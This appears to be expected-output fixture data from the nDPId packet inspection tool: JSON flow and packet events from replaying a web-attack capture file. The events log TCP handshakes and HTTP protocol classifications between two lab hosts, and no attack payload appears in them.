-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1499347788375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347788375,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h61AAD4GPiOsEAABwKgKMu4IAFB6rY7PAAAAAKACchBckAAAAgQFtAQCCAoBPAliAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6841,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":2,"flow_last_seen":1499347788375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347788375,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7gg8gqx8eq2O0KAScSCVswAAAgQFtAQCCAoD5drXATwJYgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":3,"flow_last_seen":1499347788376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347788376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0h65AAD4GPiqsEAABwKgKMu4IAFB6rY7QPIKsfYAQAOU0uwAAAQEICgE8CWID5drX"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6852,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347789640,"flow_last_seen":1499347789640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347789640,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6852,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1499347789640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347789640,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83o1AAD4G50KsEAABwKgKMu4WAFDDudQTAAAAAKACchDM9QAAAgQFtAQCCAoBPAqeAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6853,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":2,"flow_last_seen":1499347789640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347789640,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7hacXl08w7nUFKAScSD0QAAAAgQFtAQCCAoD5dwTATwKngEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":3,"flow_last_seen":1499347789641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347789641,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03o5AAD4G50msEAABwKgKMu4WAFDDudQUnF5dPYAQAOWTRwAAAQEICgE8Cp8D5dwT"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347792291,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792291,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GCRAAD4GraysEAABwKgKMu4wAFDmKhURAAAAAKACchBm1gAAAgQFtAQCCAoBPA01AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":2,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347792291,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7jDnRnKf5ioVEqAScSArPwAAAgQFtAQCCAoD5d6qATwNNQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":3,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GCVAAD4GrbOsEAABwKgKMu4wAFDmKhUS50ZyoIAQAOXKRgAAAQEICgE8DTUD5d6q"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347793575,"flow_last_seen":1499347793575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347793575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1499347793575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347793575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86x9AAD4G2rCsEAABwKgKMu4+AFCp1uVpAAAAAKACchDRggAAAgQFtAQCCAoBPA52AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":2,"flow_last_seen":1499347793575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347793575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7j6t+bU4qdblaqAScSCLXgAAAgQFtAQCCAoD5d\/rATwOdgEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":3,"flow_last_seen":1499347793576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347793576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06yBAAD4G2resEAABwKgKMu4+AFCp1uVqrfm1OYAQAOUqZgAAAQEICgE8DnYD5d\/r"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347796130,"flow_last_seen":1499347796130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347796130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1499347796130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347796130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dkVAAD4GT4usEAABwKgKMoAQAFA7jGawAAAAAKACchAqNgAAAgQFtAQCCAoBPBD1AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":2,"flow_last_seen":1499347796130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347796130,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgBCKrPedO4xmsaAScSDCewAAAgQFtAQCCAoD5eJpATwQ9QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":3,"flow_last_seen":1499347796130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347796130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dkZAAD4GT5KsEAABwKgKMoAQAFA7jGaxiqz3noAQAOVhgwAAAQEICgE8EPUD5eJp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347797419,"flow_last_seen":1499347797419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347797419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1499347797419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347797419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tZJAAD4GED6sEAABwKgKMoAeAFBmW6elAAAAAKACchC9IQAAAgQFtAQCCAoBPBI3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":2,"flow_last_seen":1499347797419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347797419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgB7MdTcTZlunpqAScSDS5QAAAgQFtAQCCAoD5eOsATwSNwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":3,"flow_last_seen":1499347797420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347797420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tZNAAD4GEEWsEAABwKgKMoAeAFBmW6emzHU3FIAQAOVx7QAAAQEICgE8EjcD5eOs"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347798713,"flow_last_seen":1499347798713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347798713,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1499347798713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347798713,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LWRAAD4GmGysEAABwKgKMoAsAFA\/CD4fAAAAAKACchBMqQAAAgQFtAQCCAoBPBN7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6925,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":2,"flow_last_seen":1499347798713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347798713,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgCwp5bxCPwg+IKAScSB+iwAAAgQFtAQCCAoD5eTvATwTewEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":3,"flow_last_seen":1499347798714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347798714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LWVAAD4GmHOsEAABwKgKMoAsAFA\/CD4gKeW8Q4AQAOUdkwAAAQEICgE8E3sD5eTv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347801271,"flow_last_seen":1499347801271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347801271,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1499347801271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347801271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZRhAAD4GYLisEAABwKgKMoBGAFBeRnDiAAAAAKACchD4DgAAAgQFtAQCCAoBPBX6AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6944,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":2,"flow_last_seen":1499347801271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347801271,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgEYSjN1bXkZw46AScSAdsQAAAgQFtAQCCAoD5edvATwV+gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":3,"flow_last_seen":1499347801271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347801271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZRlAAD4GYL+sEAABwKgKMoBGAFBeRnDjEozdXIAQAOW8uAAAAQEICgE8FfoD5edv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347802549,"flow_last_seen":1499347802549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1499347802549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jF5AAD4GOXKsEAABwKgKMoBUAFDx5ZtkAAAAAKACchA4nwAAAgQFtAQCCAoBPBc6AAAAAAEDAwc="} 